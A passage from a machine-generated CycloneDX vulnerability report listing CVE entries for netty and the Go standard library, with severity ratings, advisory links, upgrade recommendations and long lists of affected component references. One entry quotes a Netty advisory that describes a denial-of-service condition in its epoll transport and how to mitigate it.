          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-42499",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "description": "Pathological inputs could cause DoS through consumePhrase when parsing an email address according to RFC 5322.",
      "recommendation": "Upgrade stdlib to version 1.25.10, 1.26.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42499"
        },
        {
          "url": "https://go.dev/cl/771520"
        },
        {
          "url": "https://go.dev/issue/78987"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42499"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-4977"
        }
      ],
      "published": "2026-05-07T20:16:44+00:00",
      "updated": "2026-05-08T22:16:33+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.2",
          "versions": [
            {
              "version": "v1.26.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:golang/stdlib@v1.26.2",
          "versions": [
            {
              "version": "v1.26.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-42577",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "description": "## Summary\n\nNetty's epoll transport fails to detect and close TCP connections that receive a RST after being half-closed, leading to stale channels that are never cleaned up and, in some code paths, a 100% CPU busy-loop in the event loop thread.\n\n## Affected versions\n\nAll versions of 4.2.x `netty-transport-native-epoll` up to and including 4.2.12.Final\n\n## Fixed in\n\n4.2.13.Final (fix merged into the `4.2` branch via [#16689](https://github.com/netty/netty/pull/16689); release not yet cut as of 2026-04-25).\n\n## Severity\n\n**Medium** \u2014 Denial of Service (resource exhaustion / CPU spin)\n\n**CWE:** CWE-772: Missing Release of Resource after Effective Lifetime\n\n## Description\n\nWhen a TCP connection using Netty's epoll transport has `ALLOW_HALF_CLOSURE` enabled (or is in a half-closed state via the HTTP codec), and the remote peer:\n\n1. Sends a FIN (half-close), causing the server to mark the input as shutdown, then\n2. Sends a RST (e.g. by closing with `SO_LINGER=0`)\n\nthe server-side channel is never closed. This happens because:\n\n- `epollOutReady()` is a no-op when there is no pending flush.\n- `epollInReady()` short-circuits via `shouldBreakEpollInReady()` because input is already marked as shutdown.\n- The `EPOLLERR`/`EPOLLHUP` error condition is therefore never processed, and `channelInactive` is never fired.\n\nDepending on the Netty version and configuration, this results in:\n\n- **Stale channels**: The connection is never closed or deregistered. 
An unauthenticated remote attacker can repeat the sequence to accumulate stale connections, exhausting file descriptors, memory, or connection-count limits.\n- **CPU busy-loop**: In code paths where `clearEpollIn0()` is not called during the `ChannelInputShutdownReadComplete` event, `epoll_wait` returns immediately on every iteration for the affected fd, causing 100% CPU utilization on the event loop thread and starving all other connections multiplexed on it.\n\n## Mitigation\n\n- Upgrade to 4.2.13.Final when released (or build from the `4.2` branch at commit [`0ec3d97`](https://github.com/netty/netty/commit/0ec3d97fab376e243d328ac95fbd288ba0f6e22d)).\n- If upgrading is not immediately possible, configure idle timeouts on connections to limit the lifetime of stale channels.\n\n## Resources\n\n- Issue: https://github.com/netty/netty/issues/16683\n- Fix: https://github.com/netty/netty/pull/16689",
      "recommendation": "Upgrade io.netty:netty-transport-native-epoll to version 4.2.13.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42577"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/0ec3d97fab376e243d328ac95fbd288ba0f6e22d"
        },
        {
          "url": "https://github.com/netty/netty/pull/16689"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-rwm7-x88c-3g2p"
        }
      ],
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-transport-native-epoll@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1a7682d6-0f43-4e09-b5e7-a3b641f2b5d2"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1a7682d6-0f43-4e09-b5e7-a3b641f2b5d2"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1a7682d6-0f43-4e09-b5e7-a3b641f2b5d2"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1a7682d6-0f43-4e09-b5e7-a3b641f2b5d2"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1a7682d6-0f43-4e09-b5e7-a3b641f2b5d2"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1a7682d6-0f43-4e09-b5e7-a3b641f2b5d2"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1a7682d6-0f43-4e09-b5e7-a3b641f2b5d2"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#1a82763b-fa53-454d-a15f-dcf7e00f4e18"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#1a82763b-fa53-454d-a15f-dcf7e00f4e18"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#1a82763b-fa53-454d-a15f-dcf7e00f4e18"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#1a82763b-fa53-454d-a15f-dcf7e00f4e18"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#1a82763b-fa53-454d-a15f-dcf7e00f4e18"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#1a82763b-fa53-454d-a15f-dcf7e00f4e18"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#1a82763b-fa53-454d-a15f-dcf7e00f4e18"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#35dd4a78-8d5b-4825-a496-0e025a4608d2"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#35dd4a78-8d5b-4825-a496-0e025a4608d2"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#35dd4a78-8d5b-4825-a496-0e025a4608d2"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#35dd4a78-8d5b-4825-a496-0e025a4608d2"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#35dd4a78-8d5b-4825-a496-0e025a4608d2"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#35dd4a78-8d5b-4825-a496-0e025a4608d2"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#35dd4a78-8d5b-4825-a496-0e025a4608d2"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#b69f03d8-9de7-4f7b-aaa6-ccd17f4b9579"
        },
        {
